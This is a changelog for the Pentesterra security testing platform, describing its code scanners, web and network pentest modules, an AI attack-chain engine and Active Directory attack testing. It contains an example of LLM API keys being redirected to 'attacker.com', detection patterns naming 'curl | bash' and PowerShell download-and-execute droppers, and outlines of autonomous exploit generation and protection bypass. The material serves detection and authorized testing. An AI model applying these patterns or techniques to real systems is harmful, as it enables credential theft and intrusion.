Pentesterra Changelog

2026-04-07 · DevGuard v1.3.55 · minor

Pentesterra DevGuard has been updated to version 1.3.55.

Highlights:

• New module: API Route Security Analysis
• New module: Credential Flow Analysis
• New module: GraphQL Security Analysis

⭐ API Route Security Analysis analyzes Python/Go API services directly from the codebase:

• endpoint inventory
• detection of unauthenticated endpoints
• identification of missing access control / data separation
• mapping endpoints to business processes and assessing their criticality
• integrating discovered artifacts into the Application Security model
• evaluating impact on Application Logic Risks
• assessing impact on business processes and compliance

⭐ Credential Flow Analysis:

• identifies where and how credentials are used in code (tokens, API keys, connection strings, user/password, etc.)
• detects unsafe handling, such as credentials written to logs without masking
• analyzes intended usage vs. deviations from security standards
• flags cases where credentials may be used insecurely (e.g., exposed to prompts / MCP contexts)

⭐ GraphQL Security Analysis:

• detects GraphQL APIs across SDL schema files, Graphene, Strawberry, Apollo, and Nexus codebases
• identifies unauthenticated mutations and sensitive queries
• detects missing authorization decorators on resolvers
• flags introspection endpoints left exposed in production
• tracks auth coverage across query / mutation / subscription operations - without transmitting any source code

2026-04-06 · DevGuard v1.3.50 · minor

Highlights

• CLI bundled with the IDE extension: the VS Code, Cursor, and Windsurf extension now ships with the DevGuard CLI embedded. On first activation the CLI installs automatically - no internet connection required, no separate download step.
• Accurate installed dependency versions: DevGuard now runs the package manager directly (`npm list`, `yarn list`, `pnpm list`, `poetry show`) to detect the version that is actually installed in your project, not just what is declared in manifests. Eliminates false positives where a patched version was installed but the lockfile still referenced an older range.
• GraphQL API security analysis: new module covers GraphQL APIs (SDL schemas, Graphene, Strawberry, Apollo, Nexus). Reports unauthenticated mutations, unprotected sensitive queries, and introspection endpoints left open - without transmitting any source code.
• Multi-branch CVE matching fix: CVEs with different fix versions per major version series (e.g. Next.js 11.x–15.x) are now correctly matched across all affected branches, fixing a false negative where a vulnerable version could pass the check because only one branch's fix version was evaluated.
• Better auth coverage on API routes: global authentication middleware (Flask `before_request`, Express `app.use()`, Django MIDDLEWARE, NestJS guards) is now correctly recognized as protecting every route it covers - routes secured via a global gate no longer appear as "unprotected" in API Route Security findings.

Improvements

• Self-hosted deployments: report links in CLI output and IDE extension panels now use the configured API endpoint domain instead of `app.pentesterra.com`.
• Extension update checks now run every hour instead of every 24 hours - update notifications arrive much sooner after a new release.

2026-04-05 · DevGuard v1.3.37 · minor

Highlights

• Live threat intelligence feed: malicious package / extension / MCP server lists are now stored in PostgreSQL (`devguard_threat_lists`) and updated daily by the Worker. Previously these were hardcoded on the server and never refreshed between deployments. New entries sourced from the existing `devguard_advisories` table (OSV `MAL-*` advisories, category=malware) are automatically promoted to the threat lists on each run. Hardcoded baseline remains as fallback.
• `package.json` dependency detection (no lockfile): DevGuard now detects CVEs in projects that have a `package.json` but no lockfile (`package-lock.json`, `yarn.lock`, `pnpm-lock.yaml`). Common in fresh repos or CI environments where `npm install` has not been run. Declared version ranges are stripped of semver prefixes (`^`, `~`, `>=`) to extract a matchable version.
• Configurable web app URL: the scan report link printed by the CLI (`Web: https://.../#/devguard/scan/...`) now derives the correct URL from the configured API endpoint instead of always pointing to `app.pentesterra.com`. Self-hosted and dev installs automatically get the right link. Explicit override available via `web_url` in `~/.pentesterra/config.yaml`.
• Multi-range advisory matching: CVEs with multiple affected version ranges (e.g. CVE-2025-29927 affecting Next.js 11.x–15.x) are now correctly matched even when the primary `affected_versions` column stores only one range. The analyzer falls back to checking all ranges in the `raw_data` JSONB field.

Improvements

• CLI and VS Code/Cursor/Windsurf extension update check interval reduced from 24 hours to 1 hour - no more waiting a day to get notified of a new release.
• `_check_version_once_daily` renamed internally to reflect the new 1-hour cadence.
• Scheduler: `fill_threat_lists` job added at `03:00 UTC` daily (after advisory filler at 02:55).

2026-04-04 · DevGuard v1.4.0 · major

Highlights

• New scanner module: API Route Security Analysis (Module 36). Full API endpoint inventory with authentication coverage across Flask, FastAPI, Django, Express, NestJS, Gin, Echo, and Chi. Identifies unprotected routes, auth regressions, missing authorization, and global `before_request` / middleware exemptions - without transmitting any source code.
• New scanner module: BOLA/IDOR Surface Detection (OWASP API Top 10 #1). Finds authenticated endpoints that accept resource ID parameters but lack apparent ownership verification. Confidence scoring: "high" for domain-specific IDs (`order_id`, `project_id`, `scan_id`), "medium" for generic `{id}` / `{pk}` params. Admin-tier routes are automatically excluded. Handler body analysis uses language-specific heuristics (Python: indentation scope, Go/JS: brace counting) to detect `is_owner()`, ORM filters with user context, and `abort(403)` patterns.
• Pre-push route diff: `pentesterra-devguard route-diff` compares the current API route inventory against the last saved snapshot to detect security regressions before a git push. Blocks on: new unprotected critical/high routes, auth degraded (protected → open), and API version regression (v2 protected while v1 still exposed). Runs offline - no API key required.
• Enhanced pre-push hook: the git hook now runs two sequential checks. Step 1 is the fast local route diff (no API key, no network). Step 2 is the full cloud-backed security scan. If Step 1 detects a route regression it blocks immediately without waiting for Step 2.
• Route snapshot persistence: route inventory snapshots are stored in `~/.pentesterra/route_snapshots/` keyed by project path hash. Updated automatically after every `route-audit` scan to provide an up-to-date baseline for future diffs.

Improvements

• Web console scan details: new API Route Security section shows auth coverage stats, BOLA/IDOR findings table with confidence/method/path/resource params, and business process route distribution. Accessible from the sticky navigation sidebar.
• `pentesterra-devguard route-audit` command: `--bola` flag shows the full BOLA/IDOR surface, `--no-snapshot` skips snapshot save.
• `pentesterra-devguard route-diff` command: `--fail-on-block` exits with code 1 for CI/CD integration.
• Route findings integrated into the main scan findings pipeline: `UNPROTECTED_CRITICAL_ROUTE`, `UNPROTECTED_SENSITIVE_ROUTE`, `BOLA_RISK`, and `MISSING_AUTHORIZATION` appear in the standard findings table with severity badges and category labels.

2026-04-02 · DevGuard v1.3.26 · major

Highlights

• New scanner module: Credential Flow Analysis (Module 35). DevGuard now answers not just "are there secrets?" but "where does the secret go and who else receives it?". The module performs static taint-style analysis tracing 50+ credential env vars (LLM, cloud, payment, email, DB) through the codebase to detect proxy redirect, HTTP exfiltration, subprocess curl/wget, base64 encoding, logging, webhook forwarding, MCP server exposure, and GitHub Actions supply chain leaks.
• Most dangerous case detected: LLM SDK proxy redirect - `OpenAI(api_key=key, base_url="https://attacker.com")`. The project appears to work normally while all API keys and every prompt are silently forwarded to an attacker-controlled server. Used in real-world supply chain attacks against AI developers. DevGuard detects this pattern statically before any code executes.
• New scanner module: Service Dependency Map (Module 34, free tier). Maps all external connections and services used by the project: databases, caches, queues, LLM providers, cloud services, auth services - extracted from connection strings, SDK imports, Docker Compose, and config files. Each node is assessed for unencrypted protocols, hardcoded credentials, and unauthenticated access. Helps surface forgotten services (Firebase without auth from MVP days, n8n without encryption key, Redis without password in production).
• IDE plugin report navigation: the scan results panel now features a sticky top navigation bar with jump-to links for each finding section, collapsible/expandable sections per category, severity colour coding on nav pills, and a Collapse All / Expand All toggle. Sections with critical findings are highlighted in red, high in orange.
• Extension auto-update: DevGuard VS Code/Cursor/Windsurf extension now checks for updates automatically on every activation (throttled to once per 24h). Downloads the new `.vsix`, verifies SHA256 integrity, and installs without leaving the IDE - works for both Marketplace and manual `.vsix` installs.

Improvements

• Web console scan details: Credential Flow Analysis added to navigation sidebar, category map, and findings rendering pipeline.

2026-04-01 · DevGuard v1.3.20 · major

Highlights

• New scanner module: npm Lifecycle Script Security Analysis. DevGuard now inspects every installed package in `node_modules` for malicious postinstall, preinstall, install, prepare, and prepack scripts - covering the exact attack class used in the axios 1.14.1 / WAVESHAPER supply chain incident (North Korea-nexus UNC1069/Zinc, March 2026).
• Dropper pattern detection: flags lifecycle scripts that simultaneously contain a network call, a process execution, and a file write - the three-signal signature of a cross-platform RAT dropper. All three must appear together, keeping false positives low.
• Code obfuscation detection: identifies base64+eval combinations, XOR decode loops (the `charCodeAt ^ key` pattern used in the axios attack), string reversal (`split("").reverse().join("")`), and long hex-encoded string literals in install-time scripts. Obfuscation in a postinstall has no legitimate purpose.
• Inline shell dropper detection: flags packages where the scripts field itself contains `curl | bash`, `wget | bash`, or PowerShell `DownloadString` / `IEX` - payload delivery without a JS file.
• Self-cleanup detection: identifies postinstall scripts that write to `package.json` while also performing exec or network calls - the evidence-concealment technique used to hide malicious lifecycle hooks after installation completes.
• Scoped package support: scans `@org/pkg` packages correctly alongside flat packages. Monorepo workspace `node_modules` directories are discovered and included automatically.

Improvements

• All four npm finding types carry structured remediation guidance with specific investigation steps (npm pack inspection, credential rotation, process log review, reporting to npm security).
• Module runs in the parallel ThreadPoolExecutor alongside all existing scanners - no increase in total scan time.
• Allowlist of known-safe native addon builders (node-gyp, esbuild, sharp, sqlite3, bcrypt, @swc/core, and others) avoids noise from legitimate binary compilation scripts.
• File size cap (256 KB per script file) and package count limit (500 packages) prevent runaway scans on very large monorepos.
• Python Runtime Execution Hook module (v5.6, `.pth` supply chain detection) remains unchanged - both Python and npm persistence vectors are now covered in parallel.

2026-03-26 · PentestBrain AI Engine · major

Highlights

• Vector attack memory: the Brain engine now remembers the outcome of every automated pentest session. Before starting a new attack chain, it searches past sessions for similar targets (same service type, port, CVE set) and uses successful patterns from previous engagements to prioritise techniques that already worked. Cross-session learning persists in the database across reboots and deployments.
• Generator + Refiner planning loop: at the start of each chain the engine now produces a structured multi-step attack plan - ordered, goal-oriented, with explicit expected outcomes per step. As the chain progresses, the Refiner adapts the remaining plan based on what was actually confirmed so far. Complex chains (4+ steps) use extended thinking to produce deeper strategic reasoning before committing to a plan.
• Attack knowledge graph: successful attack paths, exploited CVEs, credential discoveries, and pivots are now stored as a directed weighted graph per organisation. The engine queries this graph to predict which lateral movement or escalation steps are most likely to succeed based on historical evidence.
• Context compression: long-running sessions that accumulate a large message history are automatically compressed mid-run. The middle portion of the conversation is summarised by the LLM, freeing memory and keeping reasoning focused. The UI now shows a *Context Compressed* marker when this happens.
• Exploit Coder sub-agent: the Brain engine can now autonomously generate Python validator scripts for specific CVEs, dispatch them to the scanner node for execution, and iterate - fixing errors from actual output - in up to three rounds. Successful scripts are automatically saved to the Knowledge Base for reuse in future scans.
• Distributed pentest routing: the engine now queries scanner node capabilities before dispatching probes (`has_msf`, `has_paramiko`, `has_nuclei`). Each probe type is routed to the most capable available node, enabling specialised scanner nodes to handle Metasploit exploitation while others handle credential testing or script execution in parallel.

Improvements

• Attack chain UI now displays three new event types: the initial multi-step Generator plan (expandable list with per-step objectives), Refiner updates after each confirmed step, and Context Compressed markers.
• All Brain session tables, vector extension, attack memory, and graph tables are registered in the migration system - they auto-apply on every new installation and production deployment with no manual SQL required.
• Brain tool dispatch is capability-aware: if no capable node is found for a probe type, the preferred scanner is used as fallback, so single-node setups continue to work without configuration changes.

2026-03-20 · Attack Chain Engine · major

Highlights

• Kill chain phase labels on every attack chain step: each step now carries an explicit phase badge - *Initial Access*, *Exploitation*, *Privilege Escalation*, *Lateral Movement*, or *Impact* - making attack paths immediately readable by both security teams and business stakeholders.
• Impact-typed CVE exploit nodes: network CVEs are now routed to four distinct graph nodes - `cve_exploit_rce`, `cve_exploit_auth`, `cve_exploit_dos`, and `cve_exploit_info` - instead of collapsing all CVEs into a single generic exploit node. Each type generates its own attack chain, so RCE and authentication bypass paths are no longer mixed.
• Per-CVE triage: security analysts can now mark individual CVEs as False Positive, Accepted Risk, or Confirmed - independently of the service triage. The engine respects per-CVE decisions when building chains, giving teams surgical control over which vulnerabilities produce attack paths.
• Separate entry points for top CVEs: the top two most dangerous CVEs per impact type (e.g. two separate RCE CVEs on the same host) now generate independent chain entry points, so each high-priority vulnerability appears as its own attack path rather than being merged.
• Multi-asset aggregate analysis: new `POST /api/v1/attack_chains/aggregate` endpoint returns a unified risk view across multiple business assets simultaneously - useful for comparing exposure across all hosts in an engagement at once.
• Auto re-analyze on new scan data: the engine now tracks a `is_stale` flag on each analysis. When a new network or web scan arrives for the same asset, the analysis is marked stale. A background reanalysis can be triggered via `POST /api/v1/attack_chains/{id}/stale/reanalyze` without manual intervention.
• Stable chain fingerprint: each chain now carries a `chain_fingerprint` derived from its entry point, impact node, and data sources - not from the display text. Fingerprints survive re-analysis, so False Positive and Accepted Risk exceptions remain correctly attached even after the underlying scan is refreshed.

Improvements

• Lateral movement blast radius: the lateral movement step now reports `blast_radius_hosts` - the count of unique IPs reachable in the same network segment - giving a concrete measure of how far a pivot could spread.
• SSRF → containerized app detection: SSRF chains now automatically confirm a cloud metadata pivot step when the target asset uses container technology (k8s/Docker port detection or tech tags), closing a gap for modern cloud-native deployments.
• CVSS float scoring: chain risk scores now use the exact CVSS float (e.g. 9.8) rather than tier buckets (9.8 → 10.0). This improves ranking precision across chains when multiple CVEs are present.
• Theoretical path penalty reduced: chains with mostly unconfirmed steps are penalised more aggressively - the floor dropped from 0.30 to 0.10. Purely theoretical paths now score Low/Medium instead of being inflated to High.
• `accepted_risk` fully removes nodes from analysis: previously, accepting a risk reduced a node's score but still allowed chains to be built through it. Now, accepted nodes are excluded from `present_nodes` entirely and no chains are generated through them.
• KEV chains prioritised before cutoff: when more than 20 chains are computed, CISA KEV-related chains are promoted to the front before the `max_chains` slice - ensuring the most critical known-exploited paths are never dropped.
• Web scan freshness filter: the engine now queries only web scan results updated within the configured staleness window. If no fresh results exist, it falls back to the most recent available scan rather than returning empty data.
• `reachable_vuln` auto-confirm tightened: a DevGuard reachable vulnerability is now auto-confirmed as active only when it is in CISA KEV or has CVSS ≥ 9.0 - reducing false-positive confirmed steps for moderate-severity library vulnerabilities.
• DevGuard ↔ business asset many-to-many: a new `business_asset_devguard_projects` join table explicitly links business assets to DevGuard projects. The engine prioritises these explicit mappings when loading DevGuard findings, eliminating mismatches caused by name heuristics.

2026-03-19 · Network Scanner · major

Highlights

• Dramatically expanded service identification for network scanning: the enrichment pipeline now recognises 22 additional enterprise products - Cisco IOS / NX-OS / ASA, Juniper Junos, Fortinet FortiOS, Palo Alto PAN-OS, Ivanti Connect Secure (formerly Pulse Secure), Citrix NetScaler ADC, F5 BIG-IP, Checkpoint Gaia OS, Atlassian Confluence, Jira, Microsoft Exchange OWA, GitLab, phpMyAdmin, Splunk, Zabbix, Nagios, Icinga, HAProxy, Traefik, Caddy, OpenVPN, Dropbear SSH.
• New passive HTTP fingerprinting step (Step 2b): when the `Server:` header is absent or shows a CDN/proxy, the scanner now analyses `X-Powered-By`, `X-Generator`, framework-specific headers (`X-Drupal-Cache`, `X-Confluence-*`, `X-OWA-Version`, `MicrosoftSharePointTeamServices`), and session cookie names to identify the backend technology. This enables KB enrichment and CISA KEV matching even through Cloudflare and other reverse proxies.
• VNC services (port 5900) are now actively probed: the scanner reads the RFB version banner to detect libvncserver and map applicable CVEs.
• TechDetector findings (`http_info.detected_tech`) are now fed back into the product identification pipeline (Step 2c), closing the gap between HTTP technology detection and KB enrichment.

Improvements

• `ms-rdp` → product mapping (Remote Desktop Services / Microsoft).
• Vendor enrichment map expanded with 14 new vendors: Cisco, Juniper, Ivanti, Citrix, Palo Alto Networks, Checkpoint, F5, Atlassian, Splunk - enabling fallback CVE lookup when banner parsing succeeds in identifying vendor but not version.
• `_title_keywords` and `_vendor_hints` extended with 22 new keywords to capture product identity from HTTP page titles.
• All new product patterns support version extraction where version strings appear in banners, enabling the more accurate `by_version` KB lookup mode instead of `by_product_with_checks`.

2026-03-19 · Web App Pentest · major

Highlights

• Three new scanning modules close critical gaps in OWASP API Security Top 10 (2023): Mass Assignment / BOPLA (API3), Rate Limit Bypass (API4), and API Versioning Security (API9).
• Mass Assignment scanner tests POST/PUT/PATCH endpoints by injecting 28 privileged fields (`role`, `isAdmin`, `price`, `balance`, `permissions`, `approved`, ...) and detects when they are reflected in responses or change the HTTP status from 4xx to 2xx.
• Rate Limit Bypass scanner first confirms that a rate limit exists (15 rapid requests → expects 429), then tests 10 IP-spoofing headers and 6 path-variation techniques to detect bypasses. Severity is `high` when a 429 → 200 transition is achieved.
• API Versioning scanner detects the current API version from path, header, and query param, then probes legacy versions (`v0`, `v1`, `legacy`, `deprecated`, `beta`, dated versions) for auth bypass and data-leakage indicators.
• New Rule Engine infrastructure components reduce redundant HTTP requests and improve test accuracy across all modules.

Improvements

• SharedBaselineCache: a single baseline GET per unique endpoint is performed before all modules start - eliminates the 3–5× redundant baseline traffic that each module previously generated independently.
• EndpointModuleRouter: endpoints are now sorted by relevance for each module before being passed to it, using a scoring model (preferred_modules hints, tag overlap, HTTP method preference, path pattern match, platform boost). 24 modules have dedicated path patterns and tag sets.
• PlatformPayloadProfile: the detected platform fingerprint (WordPress, Drupal, Django, Laravel, Rails, Spring Boot, ASP.NET, React/SPA, etc.) now controls additional paths, parameters, and payloads injected per module - replacing the static payload approach.
• All three infrastructure components are fail-safe: if initialisation fails, scanning continues without them.
• New modules added to the web pentest profile builder UI under API & Services category and included in the OWASP preset by default.

2026-03-18 · DevGuard · major

Highlights

• Attack Chains now support False Positive and Accepted Risk management. Mark any chain as a false positive or a known accepted risk - it moves to the Exceptions tab and stops affecting analysis scores. Typical use case: Redis detected in infrastructure but not exposed to the internet - the chain is technically valid but not an actionable finding.
• Exceptions are scoped: mark a chain for a specific asset (domain/IP), for the entire DevGuard project, or organization-wide.
• The new Exceptions tab in Attack Chain Detail shows all marked chains with scope, reason, and the option to restore them to the active list at any time.

Improvements

• Each chain row now has a one-click mark button - opens a modal with type (False Positive / Accepted Risk), scope selector, and a reason field.
• Chain identity is tracked by a stable fingerprint (SHA-256 of chain path + impact), so exceptions survive re-analysis.

2026-03-17 · DevGuard · major

Highlights

• Business Logic Analysis now correctly distinguishes server-side API endpoints from client-side SPA navigation routes (React Router, Vue Router, Angular Router). Previously, React pages like `/login`, `/register`, `/admin/*` were incorrectly flagged as unprotected server endpoints - these false positives are now fully eliminated.
• Global authentication middleware is now detected and respected: Flask `@before_request`, Express `app.use(authMiddleware)`, Django `MIDDLEWARE`, and NestJS global guards are recognized as implicit protection for all routes. Individual routes no longer need per-route auth decorators to be considered protected.
• Public route whitelists (`PUBLIC_ROUTES`, `WHITELIST_PATHS`, inline `if path in ['/login', '/health']` patterns) are extracted from auth middleware code and used to correctly mark explicitly public routes.
• "Compute Risk Analysis" in the DevGuard Scan Details view is now fully functional - the button triggers attack vector analysis and displays results without requiring navigation to another section.
• The App Security Model (ASM) section in scan details now reliably appears for all projects, including those with only SPA routes. A dedicated "SPA Routes" metric shows client-side coverage separately from server-side endpoints.
• Attack Chain detail view: DevGuard stat widgets (cloud credentials, supply chain findings, etc.) are now clickable links that navigate directly to the corresponding DevGuard scan.
• Severity sorting fixed in the Supply Chain section - Critical findings now always appear first.

Improvements

• SPA route scanner now detects `<ProtectedRoute>`, `<PrivateRoute>`, `<AuthRoute>`, and other custom Route wrapper components in React Router, not just the base `<Route>` element.
• Business logic analysis pipeline correctly propagates `global_auth=True` metadata to all server-side routes when a global auth gate is detected, enabling accurate risk scoring without per-route annotation.

2026-03-16 · DevGuard v5.4 · major

Highlights

• New scanners for Go, PHP/Laravel, and CMS platforms (WordPress, Drupal, Joomla, Magento, PrestaShop) - detecting insecure configurations, dangerous functions, debug modes, and risky plugin inventories.
• LLM Integration Risk scanner detects exposed AI gateway credentials (LiteLLM, OpenRouter, Portkey), insecure agentic loop patterns, missing guardrails, and LLM output passed to code execution (RCE chain).
• Prompt Injection Risk scanner identifies multi-agent trust boundary violations and system prompts constructed from unvalidated external data sources.
• All scan results are now displayed in full - no truncation in CLI reports, IDE extension panels, or web console. Every finding is shown as-is.

Improvements

• Fixed a runtime version detection issue where the reported Node.js version could differ between the developer's machine and the production server due to an incorrect upgrade threshold in the deployment script.
• LLM-assisted analysis expanded with server-side AI gateway: all cloud analysis features (business process inference, crypto false-positive reduction, attack scenario generation) now run via Pentesterra's own infrastructure - no external LLM API keys required from users.
• IDE extension updated to v1.3.0.

2026-03-12 · DevGuard · major

Highlights

• Six new scanners expand DevGuard coverage into AI tooling, automation platforms, IDE supply chain risks, and vector database exposure.
• Transitive Dependency Tracking parses `package-lock.json` (v2/v3) to detect nested dependency chains and identify vulnerable packages beyond direct dependencies.
• SAST Lite introduces lightweight static analysis with 20+ patterns covering SQL injection, XSS, command injection, SSRF, insecure deserialization, prototype pollution, and prompt injection across Python and JS/TS.
• Automation Platform Risk scanner detects insecure automation workflows including dangerous n8n nodes, missing authentication, and exposed webhook integrations for platforms such as Zapier, Make, and IFTTT.
• AI Agent Configuration scanner analyzes agent frameworks and detects dangerous tool exposure (ShellTool, BashTool, PythonREPLTool), unsafe prompt patterns, and persistent memory risks.
• Vector Database Exposure scanner identifies exposed AI vector databases and credentials including Pinecone, Weaviate, and Qdrant configurations.
• IDE Plugin Threat Intelligence adds supply-chain protection by detecting malicious extensions, typosquatted packages, and unsafe AI agent permissions in developer environments.

Improvements

• Extended secret detection patterns with 8 additional AI/LLM API key types including HuggingFace, Groq, LangSmith, Replicate, Perplexity, Mistral, Cohere, and Together AI.
• Expanded threat intelligence datasets for malicious NPM and PyPI typosquatted packages targeting AI and automation ecosystems.
• Added new exposed endpoint patterns for AI services such as LangServe, Gradio, Jupyter, Ollama, MLflow, and n8n webhooks.
• Remediation guidance expanded with 35+ new remediation entries covering AI tooling, automation workflows, and vector database security.
• API client updated to support extended scan submissions with additional metadata parameters.
• CLI updated to support new scan result categories and extended local summaries.
• Results panel UI updated with dedicated sections for SAST, automation platforms, AI agents, and vector databases.
• Category alias mapping added for consistent rendering across legacy and new findings.
• Collector module significantly expanded (4400+ lines) to support new scanning logic and integrations.
• Test suite expanded with 25 new tests across 5 new test classes (173 tests passing).

📢 DevGuard for IDE is now available on the VS Code Marketplace - search for “Pentesterra DevGuard” or “Pentesterra”.

2026-02-03 · Notification, verification, and vulnerability triage · major

Highlights

Pentesterra Platform Update We’ve rolled out a major upgrade to our notification, verification, and vulnerability triage system:

• System alerts from API, backend, and scanner nodes are now organized into a dedicated notification icon and section
• Message history with read/unread status is now available
• Improved notification reliability when working with multiple browser tabs
• Backend now generates alerts for:
• Critical vulnerabilities with known exploits
• Vulnerabilities listed in CISA KEV
• Successfully verified critical network vulnerabilities

Improvements

• Refactored manual False Positive / False Negative (FP/FN) tagging and resolution workflow
• Optional automatic vulnerability verification
• Configurable weights and tuning options for different verification methods and scripts
• Targeted verification for individually selected vulnerabilities
• Improved detection of potential vulnerabilities
• Full vulnerability triage workflow:

`potential / detected → verified / exploited / unconfirmed`

• Direct links from detected vulnerabilities to the Knowledge Base, opening detailed information in a new tab

These improvements significantly enhance accuracy, transparency, and operational efficiency across Pentesterra’s automated security pipeline.

2026-01-16 · API route access control · minor

Highlights

Global update to API route access control 🚀 We have significantly revised access control across API routes:

• In line with the existing RBAC (Role-Based Access Control) model, all access checks are now performed exclusively through roles for every actor.
• In addition to user roles, dedicated roles for scanners and backend components have been introduced. This provides greater flexibility for different processes and deployment scenarios.
• Each scanner or backend component can be assigned its own specific role, granting access only to explicitly allowed API routes.
• During manual or automatic registration of a new scanner, a default scanner-node role is assigned, which can later be replaced with a more specific role if required.

Scanner roles now clearly restrict access to only the API routes and data required for scanner nodes, eliminating the need for additional decorators or ad-hoc permission checks at the API route level.

2025-12-20 · Added Bug Bounty Programs Feed · minor

Highlights

Previously, public Bug Bounty programs could be found inside the general Security Feeds via search. Our users asked for a dedicated and more convenient way to track them - so we built it.

• Pentesterra now includes a separate Bug Bounty Programs page, making it easier to follow program updates, announcements, and opportunities.
• At the same time, the original Security Feeds section still supports keyword-based search, so you can continue exploring all security news as before.

This feature will be available to all users, including from Tier 0 (free). More updates coming soon.

2025-12-19 · New unified Scan & Pentest Profile Builder · major

Highlights

We’ve delivered a significant update to the web app, introducing a completely new unified Scan & Pentest Task Builder designed to simplify workflows, reduce fragmentation, and provide much more flexibility in how scans are created and executed. 💫 The feature is already tested and pushed to main. Once updates to the scanner, API, and backend are finalized, it will be included in the next release.

Improvements

• Single unified wizard for creating both tasks and reusable profiles - can be launched immediately or scheduled.
• Hybrid & multi-phase scanning
• A single task can now combine:
• network scanning (with different strategies)
• web pentesting or run any of them
• Independent configuration per scan type
• Different scanners and different targets can be assigned per module, with fully isolated execution pipelines.

In progress

• Updated scheduler logic for complex / multi-stage tasks
• Scanner logic improvements including task priorities per tier
• Role & tier–based UI access separation down to UI elements and checkboxes
• Feature-based access separation across tiers

2025-12-16 · Refactoring Online Quick Tools and Security Feeds · minor

Highlights

We’ve completed a refactoring pass across Online Quick Tools and Security Feeds pages, focused on usability, data exploration, and reporting. What’s updated:

• Interactive charts

You can now select a specific time range directly on the chart and toggle categories on/off for clearer analysis.

• Extended table & search capabilities

Tables and search have been enhanced to support deeper filtering and more efficient data navigation.

• Redesigned Security Summary

The Security Summary section has been reworked to support daily, weekly, monthly, and yearly security digests.

• Improved CVE search & Knowledge Base

The CVE search flow has been restructured and integrated more tightly with the CVE Knowledge Base for faster lookup and better context.

• Enhanced search in Web Pentest data

Search across Web Pentest results has been improved for more accurate and relevant matches.

2025-11-06 · Expanded Web Discovery Toolkit · minor

Highlights

• Dynamic discovery modules now plug into the web-app pentest to complement existing SPA/API/DNS endpoint mapping.
• Context brute-forcing and base-path detection uncover deeper application roots.
• Redirect and link analysis highlights hidden surfaces for follow-up testing.
• 404 response parsing extracts <a>, <script>, fetch(), and similar clues to enrich context automatically.
• Lightweight SPA-focused wordlists and heuristics tailored to modern front-ends.
• Weighted enumeration of common paths such as /app, /static, and /assets based on detected technologies.
• Enhanced Playwright phases rerun SPA analysis on newly discovered contexts to surface fetch calls, REST endpoints, and routes ahead of authentication.

Improvements

• Provides earlier insight into attack paths by mirroring reconnaissance depth from network pentests in the web workflow.

2025-11-05 · Web Pentest Artifact Reuse Pipeline · minor

Highlights

• Harvested artifacts like Set-Cookie/Authorization headers, Playwright tokens, and other session materials are automatically extracted and stored in context.
• Collected artifacts are reused across subsequent requests inside the web pentest module, mirroring how Pentesterra network engagements reuse discovered accounts and tokens.
• New pipeline is in active development, passing tests, and slated for release soon.

Improvements

• Brings lateral movement and credential reuse logic from network pentests into the web testing workflow.

Notes

• Early access build focuses on reliability; wider rollout planned after final validation.

2025-10-16 · New Web Application Modules in Development and Testing · major

Highlights

• LFI/Path Traversal detection with nuclei payloads.
• XSS (Reflected/DOM) Cross-Site Scripting detection + nuclei.
• SQL Injection - Error/Boolean/Time-based SQLi detection + nuclei.
• SSTI (Template Injection) Server-Side Template Injection + nuclei.
• Deserialization vulnerabilities detection.
• JWT Vulnerabilities - JSON Web Token security analysis.
• Security Headers analysis for missing headers.
• TLS/SSL Analysis - Certificate and cipher suite checks.
• Cloud Metadata exposure (AWS/GCP/Azure).
• HTTP Smuggling - Request smuggling and cache poisoning.
• IDOR Detection - Insecure Direct Object References.
• Open Redirect - URL redirection to external domains + nuclei.
• Technology Stack - Framework and version detection.
• WAF/CDN Detection - Protection system identification.
• CVE Detection - Known vulnerability patterns + nuclei.
• Cookie Security - Secure cookie configuration.
• CSP Analysis - Content Security Policy validation.
• Clickjacking - X-Frame-Options validation.
• Command Injection - OS command injection and RCE detection + nuclei.
• File Upload - Unrestricted file upload vulnerabilities + nuclei.
• XXE (XML External Entity) injection + nuclei.
• SSRF/RFI - Server-side request forgery and RFI + nuclei.
• GraphQL Injection - GraphQL query injection and introspection.
• Zip Traversal - Zip archive path traversal.
• Nuclei CVE Scanner - Additional CVE detection layer.

Improvements

• Enhanced detection depth and improved validation logic.
• New categories of web-based security testing.
• Verification of detected vulnerabilities for reliable results.

2025-08-08 · Extended WAF Detection · minor

Highlights

• Extended WAF detection capabilities.
• Passive and active WAF detection methods.

2025-08-07 · New Detection & Evasion Capabilities · major

Highlights

• DoS Protection Detection and Bypass.
• CDN Detection and Origin Discovery.
• LoadBalancerDetector - F5, NGINX, AWS ALB, HAProxy detection.
• ProxyDetector - Reverse proxies, Squid, Apache mod_proxy detection.
• DockerDetector - Docker containers and Swarm detection.
• K8sDetector - Kubernetes clusters and services detection.
• VMwareDetector - vSphere and ESXi environments detection.
• CloudDetector - AWS, Azure, GCP detection.
• GeoBlockingDetector - geographic access restrictions.
• AntiAutomationDetector - anti-bot and automation defenses.
• IPSDetector - behavioral intrusion prevention systems.

Improvements

• All modules integrated into adaptive scanning workflow.
• Caching, smart prioritization, and real-time feedback.

2025-08-07 · Scanner Performance Update · minor

Highlights

• Adaptive Scan Parameters - automatic adjustment based on network type.
• Smart Port Selection - prioritized -> extended -> full sets.
• Parallel Scanning - up to 3-4 simultaneous CIDR blocks.
• Intelligent Grouping - similar networks scanned together.
• Caching System - avoids redundant protection checks.
• Adaptive Scheduling - smaller networks scanned first.

Improvements

• Scanning 4 CIDR blocks: improved from 5.6s -> 2.8s.
• Smart grouping: +20-30% efficiency.
• Protection caching: reduced load on protected systems.
• Prioritization: faster feedback for small networks.

2025-08-05 · Navigator and Monitoring Updates · minor

Highlights

• Added upcoming events to the digest.
• Events searchable via Navigator.
• Navigator includes more sources: exploits, PoCs, vulnerabilities, and news.
• Social media trend tracker for monitoring posts and discussions.
• Darknet monitoring for Gov version.
• Host protection detection before starting analysis.
• Protection bypass methods based on detected defense mechanisms.

Improvements

• Scan parameters adjust automatically if protection is detected.
• Updated and improved quickinfo section.

2025-07-15 · QuickInfo Page Update · minor

Highlights

• Persistent State - scan results stay visible when switching pages.
• FindSubDomain Upgrade - DNS record fetching and live status indicators.
• Revamped UI for FindSubDomain.
• One-click JSON Copy for any module.
• Dark Theme Overhaul matching modern standards.

Improvements

• Improved API Communication Protocol.
• More efficient data handling.
• Blue theme coming soon as alternative.

Fixes

• Patched several minor protocol vulnerabilities.

2025-03-16 · Active Directory Security Analysis Framework Update · major

Highlights

• Domain Controller discovery (Unauthenticated).
• User, group, and share enumeration (Standard User).
• GPO analysis (Standard User).
• AS-REP Roasting, Kerberoasting (Standard User).
• Password spraying, NTLM relay (Standard User and Unauthenticated).
• Pass-the-Hash, Pass-the-Ticket, Silver Ticket (Standard User).
• Null session vulnerabilities.
